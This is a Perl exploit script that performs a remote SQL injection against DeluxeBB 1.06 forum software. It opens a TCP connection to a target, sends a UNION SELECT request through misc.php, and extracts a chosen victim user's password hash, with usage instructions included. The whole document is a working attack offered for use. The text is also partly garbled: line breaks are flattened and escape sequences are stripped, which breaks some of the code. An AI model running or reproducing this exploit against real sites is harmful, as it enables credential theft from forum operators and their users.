#!/usr/bin/perl use IO::Socket; print q{ ############################################# # DeluxeBB 1.06 Remote SQL Injection Exploit# # exploit discovered and coded # # by KingOfSka # # http://contropotere.netsons.org # ############################################# }; if (!$ARGV[2]) { print q{ Usage: perl dbbxpl.pl host /directory/ victim_userid perl dbbxpl.pl www.somesite.com /forum/ 1 }; exit(); } $server = $ARGV[0]; $dir = $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; print "----------------------------------------------------------------------- -------------------------rn"; print "[>] SERVER: $serverrn"; print "[>] DIR: $dirrn"; print "[>] USERID: $userrn"; print "----------------------------------------------------------------------- -------------------------rnrn"; $server =~ s/(http://)//eg; $path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$ user ; print "[~] PREPARE TO CONNECT...rn"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTEDrn"; print "[~] SENDING QUERY...rn"; print $socket "GET $path HTTP/1.1rn"; print $socket "Host: $serverrn"; print $socket "Accept: */*rn"; print $socket "Connection: closernrn"; print "[+] DONE!rnrn"; print "--[ REPORT ]----------------------------------------------------------------------- -------------rn"; while ($answer = <$socket>) { if ($answer =~/(w{32})/) { if ($1 ne 0) { print "Password Hash is: ".$1."rn"; print "----------------------------------------------------------------------- ---------------rn"; } exit(); } } print "----------------------------------------------------------------------- -------------------------rn";